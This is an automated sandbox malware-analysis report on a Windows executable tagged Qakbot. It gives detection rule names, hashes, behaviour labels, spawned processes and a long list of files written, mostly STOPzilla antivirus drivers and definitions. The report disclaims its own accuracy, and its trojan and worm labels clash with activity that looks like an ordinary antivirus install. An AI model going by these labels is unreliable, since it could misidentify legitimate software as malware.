Qakbot_76507644f6
mzpefinder_pcap_file.YR, Qakbot.YR, GenericInjector.YR, GenericIRCBot.YR, TrojanDownloaderVundo.YR, TrojanPSWOnlineGames.YR, PUPHomePages.YR, PackedMysticCompressor.YR, GenericDownloader.YR, RATTurkojan.YR, GenericAutorunWorm.YR, SpyEye.YR, Necurs.YR, PackedThemida.YR, GenericPhysicalDrive0.YR, Bancos.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Banker, OnlineGames, Trojan, Worm, Packed, PUP, WormAutorun, IRCBot
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 76507644f6d260d0bd52b3650c4c3991
SHA1: 6f50fb678f311c17be31f51c36cd1be2c2094640
SHA256: c5217ce2b55c003a08bf4d1dd3063ecf28a23089e2f52fc52e7f1e664d74aafc
SSDeep: 49152:58JnE3qBoj9ghi1RebpyTIg9Cbk/VRduSwZPSCdDS OuSlMQSFh6:58JnEwoj9ghi1RebMIg9Cbk/VeS
Size: 2042440 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: iS3, Inc.
Created at: 2015-04-07 19:50:21
Analyzed on: Windows7Ada SP1 64-bit
Summary:
Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via an IRC channel. |
Process activity
The Trojan creates the following process(es):
SBSetupDrivers.exe:3152
SBSetupDrivers.exe:1812
%original file name%.exe:1912
runonce.exe:3092
runonce.exe:2736
GFI.Tools.Run64.exe:1928
DrvInst.exe:2212
DrvInst.exe:1680
STOPzilla.exe:3836
RUNDLL32.exe:3528
regsvr32.exe:3500
regsvr32.exe:1496
SZNetAssistant.exe:3916
mobsync.exe:3264
SZServer.exe:3384
SZServer.exe:992
SZWSC.exe:3788
SZWSC.exe:2612
MsiExec.exe:2456
MsiExec.exe:2624
The Trojan injects its code into the following process(es):
SBAMSvc.exe:3448
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process SBSetupDrivers.exe:3152 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\drivers\sbwtis.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wnet\SbFwIm.sys (122 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\sbapifs.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\sbhips.sys (65 bytes)
C:\Windows\System32\drivers\sbhips.sys (65 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\SBWTIS.sys (90 bytes)
%Program Files% (x86)\STOPzilla\Drivers\amd64\wlh\sbfw.sys (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DRVSetup\SetupDrv.log (17489 bytes)
C:\Windows\System32\drivers\sbapifs.sys (90 bytes)
C:\Windows\System32\drivers\SbFw.sys (1543 bytes)
The process SBSetupDrivers.exe:1812 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\System32\drivers\SETEAAC.tmp (601 bytes)
C:\Windows\System32\drivers\SbFwIm.sys (601 bytes)
C:\Windows\System32\DriverStore\infpub.dat (496 bytes)
C:\Windows\System32\drivers\sbhips.sys (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\SETDB51.tmp (3 bytes)
C:\Windows\System32\config\SYSTEM (6769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{6b8be61a-1242-088c-2864-a834156d4a47}\SETDDB5.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{6b8be61a-1242-088c-2864-a834156d4a47}\SETDDB4.tmp (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\SETDB31.tmp (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{332d6cab-08ae-5fa0-2478-ed478992213a}\amd64\wnet\SETDB62.tmp (601 bytes)
C:\Windows\System32\DriverStore\infstrng.dat (1764 bytes)
C:\Windows\System32\config\SYSTEM.LOG1 (9355 bytes)
C:\Windows\System32\catroot2\dberr.txt (1248 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\DRVSetup\SetupDrv.log (9771 bytes)
C:\Windows\System32\drivers\SbFw.sys (1281 bytes)
C:\$Directory (768 bytes)
C:\Windows\inf\oem13.PNF (8464 bytes)
C:\Windows\inf\oem14.PNF (4811 bytes)
C:\Windows\System32\drivers\SETED8A.tmp (601 bytes)
The process SBAMSvc.exe:3448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files% (x86)\STOPzilla\Definitions\LKGD\elf_hash.dat (5280 bytes)
C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\a81bb17e1f5dc49a730b06b63f6d28e9_c0322acd-5e5d-42f0-b163-c591ee6ff5b9 (61 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libNSIS.dll (3729 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504170900.xml (414 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ih.vdx (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\EPSigs.vdx (65 bytes)
C:\ProgramData\STOPzilla!\ThreatNetConfig.xml (810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\mime0.std (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMsCab.dll (6049 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libRar.dll (5729 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiarkup.dll (6010 bytes)
%Program Files% (x86)\STOPzilla\gfiark.dll (61 bytes)
%Program Files% (x86)\STOPzilla\Definitions\white0.std (15 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMsi.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\cblk.vtd (1236324 bytes)
%Program Files% (x86)\STOPzilla\Definitions\networkrules.dat (4 bytes)
%Program Files% (x86)\STOPzilla\Definitions\fsigs.vdx (192 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutl64.sys (310 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\DefVer.txt (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libtd.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bhsl.vtd (22430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libtd.dll (2377 bytes)
%Program Files% (x86)\STOPzilla\gfiark32.sys (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\adsrules.dat (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\SBTS.dat (3280 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging (20 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libEmail.dll (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\SBTS.dat (328 bytes)
%Program Files% (x86)\STOPzilla\Definitions\macroptn.std (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\macroptn.std (7306 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\smim0.std (50 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CatDesc.vdx (673 bytes)
C:\ProgramData\STOPzilla!\ServiceConfig.xml (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\hcol.wtd (226 bytes)
%Program Files% (x86)\STOPzilla\Definitions\lgpl.dll (7345 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\apincl.dat (7140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libCHM.dll (1873 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\sdll0.std (223360 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\updater.dll (3665 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatDT.vdx (392 bytes)
%Program Files% (x86)\STOPzilla\Definitions\smim0.std (5 bytes)
%Program Files% (x86)\STOPzilla\Definitions\elf_hash.dat (528 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\IncompatiblePrograms.dll (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\api0.std (3073 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ip.vtd (824 bytes)
%Program Files% (x86)\STOPzilla\SBTE.dll (49 bytes)
C:\ProgramData\STOPzilla!\History\20150425042029.xml (38 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libNSIS.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\api0.std (524 bytes)
%Program Files% (x86)\STOPzilla\Definitions\DefVer.txt (26 bytes)
C:\ProgramData\STOPzilla!\FirewallConfig.xml (1434 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\heur0.std (20 bytes)
%Program Files% (x86)\STOPzilla\mimepp.dll (212 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\remediation.dll (7961 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libRTF.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\incompats.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\updater.dll (849 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libBase64.dll (7025 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\dnrl.vdx (1513 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\AdviceTx.vdx (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatCategoryGlossary.xsd (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\TImem.vdx (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\sdll0.std (64896 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libVvs.dll (12217 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\networkrules.dat (40 bytes)
C:\ProgramData\STOPzilla!\RegistrationConfig.xml (2408 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\whsl.wtd (41850 bytes)
C:\ProgramData\STOPzilla!\ThreatDefinitionsConfig.xml (2236 bytes)
%Program Files% (x86)\STOPzilla\gfiutl64.sys (63 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dex_hash.dat (132706 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RegDT.vdx (36934 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FastSigs.vdx (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RTmem.vdx (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\unpck0.std (55 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiarkup.dll (2537 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FolderDT.vdx (1953 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libZip.dll (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dnrl.vdx (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CoreVer.txt (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\dex_hash.dat (378000 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libZip.dll (3441 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatCategoryGlossary.xsd (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CatDesc.vdx (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FileDT.vdx (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\qscnf.vdx (541 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\VVSSigs.vdx (360 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ih.vdx (11863 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CoreVer.txt (3 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bhmem.vtd (484 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Cookies.vdx (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\dnrl.vdx (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutil.dll (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\AdviceTx.vdx (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CatID.vdx (9 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libOleA.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatDT.vdx (545890 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libOleA.dll (4497 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ihmem.vtd (540 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMachoUniv.dll (2337 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\mime0.std (26 bytes)
%Program Files% (x86)\STOPzilla\Definitions\whsl.wtd (4185 bytes)
%Program Files% (x86)\STOPzilla\Definitions\remediation.dll (2449 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libOleA.dll (2105 bytes)
%Program Files% (x86)\STOPzilla\Definitions\kbu.dat (84216 bytes)
%Program Files% (x86)\STOPzilla\Definitions\heur0.std (2 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\patchw32.dll (3226 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\qscnr.vdx (8 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libCHM.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\networkrules.dat (4 bytes)
C:\Windows\System32\drivers\gfiark.sys (86 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\WebFilterExceptions.dat (1840 bytes)
%Program Files% (x86)\STOPzilla\Definitions\EPSigs.vdx (65 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\hstn.vtd (1369 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libZip.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\hstn.vtd (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\hstn.vtd (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\incompats.dat (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD (20 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMachoUniv.dll (673 bytes)
C:\ProgramData\STOPzilla!\SoftwareUpdateConfig.xml (1244 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark64.sys (41 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\adsrules.dat (281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cmem.vtd (692 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\mime0.std (26 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\EPSigs.vdx (650 bytes)
%Program Files% (x86)\STOPzilla\Definitions\kbu.dll (62 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ip.vtd (8240 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\remediation.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\comp0.std (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\SBTS.dat (328 bytes)
%Program Files% (x86)\STOPzilla\Definitions\pack0.std (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\IncompatiblePrograms.dll (2281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\whsl.wtd (5041 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libNSIS.dll (1281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\CatID.vdx (90 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\acertdefs0.std (4770 bytes)
%Program Files% (x86)\STOPzilla\Definitions\idsrules.dat (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\WebFilterExceptions.dat (184 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark.dll (955 bytes)
%Program Files% (x86)\STOPzilla\Definitions\script0.std (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FileDT.vdx (3227 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\patchw32.dll (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\lgpl.dll (13065 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\bhsl.vtd (224300 bytes)
%Program Files% (x86)\STOPzilla\Definitions\HistoryCleaner.xml (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\smim0.std (5 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\RegDT.vdx (74330 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\cname.wtd (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\JSSigs.vdx (8281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libEmail.dll (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\lib7zip.dll (4425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\VVSSigs.vdx (36 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark.dll (29 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FastSigs.vdx (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libVvs.dll (2105 bytes)
%Program Files% (x86)\STOPzilla\Definitions\qscnf.vdx (541 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RegDT.vdx (7433 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libEmail.dll (6505 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\pack0.std (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RTA84430 (5516 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\kbu.dat (86490 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\SBBIN.RTP (405 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bmem.vtd (708 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FolderDT.vdx (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libBase64.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\apprules.dat (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\lgpl.dll (73450 bytes)
%Program Files% (x86)\STOPzilla\Definitions\hcol.wtd (50 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dnrlmem.vtd (554 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\cname.wtd (905 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dexmem.vtd (348 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutl64.sys (31 bytes)
%Program Files% (x86)\STOPzilla\Definitions\sel.dat (6 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\qscnf.vdx (5410 bytes)
%Program Files% (x86)\STOPzilla\SBAMConfig.bin (20 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ctid.vtd (2001852 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\JSSigs.vdx (1 bytes)
C:\ProgramData\STOPzilla!\HIPSConfig.xml (3056 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutl32.sys (240 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\DefVer.txt (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\qscnr.vdx (8 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMsCab.dll (2321 bytes)
%Program Files% (x86)\STOPzilla\Definitions\WebFilterExceptions.dat (184 bytes)
%Program Files% (x86)\STOPzilla\Definitions\patchw32.dll (1514 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\white.wtd (3903230 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\defs0.std (50348 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\vcore.dll (395060 bytes)
%Program Files% (x86)\STOPzilla\Definitions\vcore.dll (40233 bytes)
%Program Files% (x86)\STOPzilla\Definitions\VVSSigs.vdx (36 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libRar.dll (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark64.sys (410 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ih.vdx (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\script0.std (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatCategoryGlossary.xml (470 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\JSSigs.vdx (82810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark32.sys (823 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMsCab.dll (23210 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\idsrules.dat (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FileDT.vdx (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\comp0.std (430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\IncompatiblePrograms.dll (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\dex_hash.dat (1327060 bytes)
%Program Files% (x86)\STOPzilla\gfiark64.sys (86 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libRTF.dll (1761 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\Cookies.vdx (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\updater.dll (6730 bytes)
C:\ProgramData\STOPzilla!\APConfig.xml (592 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\acertdefs0.std (477 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\RootCA.wtd (340 bytes)
%Program Files% (x86)\STOPzilla\Definitions\rem0.std (9605 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\pack0.std (140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMsi.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\white.wtd (492846 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutl64.sys (31 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\hcol.wtd (500 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\kbu.dll (450 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\idsrules.dat (136 bytes)
C:\ProgramData\STOPzilla!\HttpServerConfig.xml (624 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiarkup.dll (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libRTF.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libVvs.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RootCA.wtd (34 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatCategoryGlossary.xml (47 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RootCA.wtd (34 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\apincl.dat (714 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatID.vdx (8632 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\white0.std (150 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ckmem.vdx (412 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\defs0.std (852280 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\HistoryCleaner.xml (6730 bytes)
%Program Files% (x86)\STOPzilla\SbHips.dll (90 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\kbu.dll (620 bytes)
C:\ProgramData\STOPzilla!\CountScans.XML (338 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\AdviceTx.vdx (100 bytes)
%Program Files% (x86)\STOPzilla\gfiutil.dll (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatCategoryGlossary.xml (47 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\fsigs.vdx (192 bytes)
%Program Files% (x86)\STOPzilla\Definitions\apprules.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\rem0.std (57449 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\sel.dat (6 bytes)
C:\ProgramData\STOPzilla!\Logs\SBAMThreatEngineLog.csv (1134046 bytes)
C:\Windows\System32\drivers\gfiutil.sys (63 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cblk.vtd (998680 bytes)
%Program Files% (x86)\STOPzilla\Definitions\comp0.std (43 bytes)
%Program Files% (x86)\STOPzilla\kbu.dll (127 bytes)
%Program Files% (x86)\STOPzilla\FSSC.dat (12 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CatID.vdx (9 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\kbu.dat (842160 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMachoUniv.dll (6730 bytes)
C:\ProgramData\STOPzilla!\WSCConfig.xml (1330 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutil.dll (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libtd.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\lib7zip.dll (6730 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504171201.xml (370 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark64.sys (41 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504202902.xml (370 bytes)
%Program Files% (x86)\STOPzilla\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\heur0.std (2 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutil.dll (140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\sdll0.std (22336 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark.dll (290 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libRar.dll (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\lib7zip.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark32.sys (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatCategoryGlossary.xsd (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatID.vdx (8281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ip.vtd (824 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatDT.vdx (54589 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\bhsl.vtd (40124 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark32.sys (430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\api0.std (30730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\unpck0.std (55 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libCHM.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\sel.dat (60 bytes)
%Program Files% (x86)\STOPzilla\Definitions\defs0.std (85228 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\script0.std (5374 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ctid.vtd (3413080 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\vcore.dll (76554 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\macroptn.std (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\rem0.std (96050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\apincl.dat (714 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\apprules.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMsi.dll (3761 bytes)
C:\ProgramData\STOPzilla!\EmailAVConfig.xml (205 bytes)
%Program Files% (x86)\STOPzilla\Definitions\incompats.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CatDesc.vdx (180 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\white0.std (15 bytes)
C:\ProgramData\STOPzilla!\ScanConfig.xml (2932 bytes)
%Program Files% (x86)\STOPzilla\SBTIS.dll (114 bytes)
%Program Files% (x86)\STOPzilla\Definitions\white.wtd (390323 bytes)
%Program Files% (x86)\STOPzilla\Definitions\acertdefs0.std (477 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\Cookies.vdx (3097 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CoreVer.txt (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\cblk.vtd (9985728 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\fsigs.vdx (1920 bytes)
%Program Files% (x86)\STOPzilla\Definitions\adsrules.dat (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\unpck0.std (550 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FolderDT.vdx (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libBase64.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatID.vdx (82810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FastSigs.vdx (280 bytes)
